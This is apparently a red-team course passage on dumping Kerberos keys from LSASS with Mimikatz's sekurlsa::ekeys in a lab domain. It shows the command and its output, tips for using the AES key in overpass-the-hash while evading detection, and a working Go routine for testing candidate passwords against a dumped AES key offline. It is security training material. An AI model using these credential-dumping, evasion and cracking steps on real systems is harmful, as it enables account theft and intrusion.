Kerberos Encryption Keys
The sekurlsa::ekeys Mimikatz module dumps the Kerberos encryption keys of currently logged-on users. Most modern Windows services prefer Kerberos over NTLM, so authenticating with these keys rather than with NTLM hashes blends in better with normal authentication traffic. The keys can be used in a variety of Kerberos abuse scenarios, such as requesting a TGT as that user (overpass-the-hash). This command requires elevated privileges, because the keys are read out of LSASS memory.
beacon> mimikatz !sekurlsa::ekeys
Authentication Id : 0 ; 459935 (00000000:0007049f)
Session : Batch from 0
User Name : jking
Domain : DEV
Logon Server : DC-2
Logon Time : 9/1/2022 7:29:19 AM
SID : S-1-5-21-569305411-121244042-2357301523-1105
* Username : jking
* Domain : DEV.CYBERBOTIC.IO
* Password : (null)
* Key List :
aes256_hmac 4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6
rc4_hmac_nt 59fc0f884922b4ce376051134c71e22c
rc4_hmac_old 59fc0f884922b4ce376051134c71e22c
rc4_md4 59fc0f884922b4ce376051134c71e22c
rc4_hmac_nt_exp 59fc0f884922b4ce376051134c71e22c
rc4_hmac_old_exp 59fc0f884922b4ce376051134c71e22c
There is a known issue where Mimikatz may incorrectly label all of the keys as des_cbc_md4. The values themselves are still correct; only the labels are wrong, so identify the AES256 key by its length (32 bytes, 64 hex characters).
In this case, the AES256 key is the one we want. Tickets requested with it are AES-encrypted like the rest of the domain's traffic, whereas the rc4_hmac_nt key is simply the user's NT hash (which is why every rc4_* entry shows the same value), and using it produces RC4-encrypted tickets that stand out as a downgrade. These keys are not automatically populated into the Credential data model, but they can be added manually via View > Credentials > Add.
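To show what these keys actually are, here is an added example (not Mimikatz, Cobalt Strike or course code) that implements the RFC 3962 string-to-key derivation in Go using only the standard library: PBKDF2-HMAC-SHA1 over the password and salt, then the DK step that encrypts n-fold("kerberos") under the intermediate key. It derives the aes256_hmac key a candidate password would produce for a user in DEV.CYBERBOTIC.IO and compares it with the dumped key, which is both how such a key is cracked offline and why the AES key, unlike the NT hash, differs per realm and username. Assumptions: the account uses Active Directory's default salt (upper-case realm followed by the case-sensitive sAMAccountName) and the default 4096 iterations, and the candidate password Password123 is made up.

```go
package main

import (
	"crypto/aes"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"math/big"
	"strings"
)

// pbkdf2SHA1 is RFC 2898 PBKDF2 with HMAC-SHA1, written out so that the
// example needs nothing outside the Go standard library.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	var out []byte
	for i := 1; len(out) < keyLen; i++ {
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		mac.Write([]byte{byte(i >> 24), byte(i >> 16), byte(i >> 8), byte(i)})
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for j := 1; j < iter; j++ {
			mac = hmac.New(sha1.New, password)
			mac.Write(u)
			u = mac.Sum(nil)
			for k := range t {
				t[k] ^= u[k]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// nfold is the RFC 3961 n-fold function: repeat the input, rotating each copy
// right by a further 13 bits, then sum the n-byte chunks with ones' complement
// (end-around carry) addition.
func nfold(data []byte, n int) []byte {
	gcd := func(a, b int) int {
		for b != 0 {
			a, b = b, a%b
		}
		return a
	}
	bits := len(data) * 8
	full := new(big.Int).Sub(new(big.Int).Lsh(big.NewInt(1), uint(bits)), big.NewInt(1))
	v := new(big.Int).SetBytes(data)
	lcm := n * len(data) / gcd(n, len(data))
	var buf []byte
	for i := 0; i < lcm/len(data); i++ {
		r := (13 * i) % bits
		rot := new(big.Int).Rsh(v, uint(r))
		rot.Or(rot, new(big.Int).Lsh(v, uint(bits-r))).And(rot, full)
		buf = append(buf, rot.FillBytes(make([]byte, len(data)))...)
	}
	mask := new(big.Int).Sub(new(big.Int).Lsh(big.NewInt(1), uint(n*8)), big.NewInt(1))
	sum := new(big.Int)
	for i := 0; i < lcm; i += n {
		sum.Add(sum, new(big.Int).SetBytes(buf[i:i+n]))
		for sum.BitLen() > n*8 {
			carry := new(big.Int).Rsh(sum, uint(n*8))
			sum.And(sum, mask).Add(sum, carry)
		}
	}
	return sum.FillBytes(make([]byte, n))
}

// aesStringToKey is the RFC 3962 string-to-key for aes128-cts-hmac-sha1-96
// (keyBytes = 16) and aes256-cts-hmac-sha1-96 (keyBytes = 32):
// tkey = PBKDF2-HMAC-SHA1(password, salt), key = DK(tkey, "kerberos").
// DK encrypts n-fold("kerberos") with tkey and chains the output; on a single
// 16-byte block AES-CBC-CTS with a zero IV is one raw AES block encryption.
func aesStringToKey(password, salt string, keyBytes, iterations int) []byte {
	tkey := pbkdf2SHA1([]byte(password), []byte(salt), iterations, keyBytes)
	block, err := aes.NewCipher(tkey)
	if err != nil {
		panic(err) // keyBytes must be 16 or 32
	}
	in := nfold([]byte("kerberos"), aes.BlockSize)
	var key []byte
	for len(key) < keyBytes {
		out := make([]byte, aes.BlockSize)
		block.Encrypt(out, in)
		key = append(key, out...)
		in = out
	}
	return key[:keyBytes]
}

// adUserSalt is Active Directory's default salt for a user account: the
// upper-case DNS realm followed by the case-sensitive sAMAccountName.
// Assumption: the account has not been given a non-default salt.
func adUserSalt(realm, sam string) string {
	return strings.ToUpper(realm) + sam
}

// matchesAES256Key derives the aes256_hmac key for a candidate password with
// AD's default 4096 iterations and compares it with a key dumped by ekeys.
func matchesAES256Key(candidate, realm, sam, dumpedHex string) bool {
	derived := aesStringToKey(candidate, adUserSalt(realm, sam), 32, 4096)
	return hex.EncodeToString(derived) == strings.ToLower(dumpedHex)
}

func main() {
	dumped := "4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6" // jking's key from the output above
	fmt.Println("salt:", adUserSalt("dev.cyberbotic.io", "jking"))
	// Password123 is a made-up candidate; jking's real password is not known here.
	fmt.Println("Password123 matches:", matchesAES256Key("Password123", "dev.cyberbotic.io", "jking", dumped))
}
```

Because the salt is bound to the realm and account name, the same password gives a different AES key for every user and every domain, so there is no cross-domain or cross-user reuse the way there is with NT hashes; on the other hand, a dumped AES key is a fixed target for an offline guessing loop exactly like the one in matchesAES256Key.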
OPSEC: This module also opens a read handle to LSASS, which process-access monitoring (for example Sysmon Event ID 10 or EDR) can flag.